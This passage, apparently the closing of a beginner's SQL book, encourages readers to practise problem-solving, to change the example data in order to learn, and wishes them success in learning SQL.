understand what everything means in depth. If something doesn’t turn out as
expected, retrace your steps to find where you might have mistyped a
statement or some of the data. By building and maintaining good problem-
solving skills, you will not limit your success.
One more thing: don’t ever be afraid to change the data in the examples. It
will help you to learn more quickly if you can see for yourself what works
and what doesn’t. You can see how different results are achieved with
different data, and you will get a better understanding of how a particular
statement might work.
I want to wish you the very best of luck in learning SQL. I hope that it serves
you well in your working life and that it tempts you to move on and learn
more about the computer programming languages that every organization
loves to use.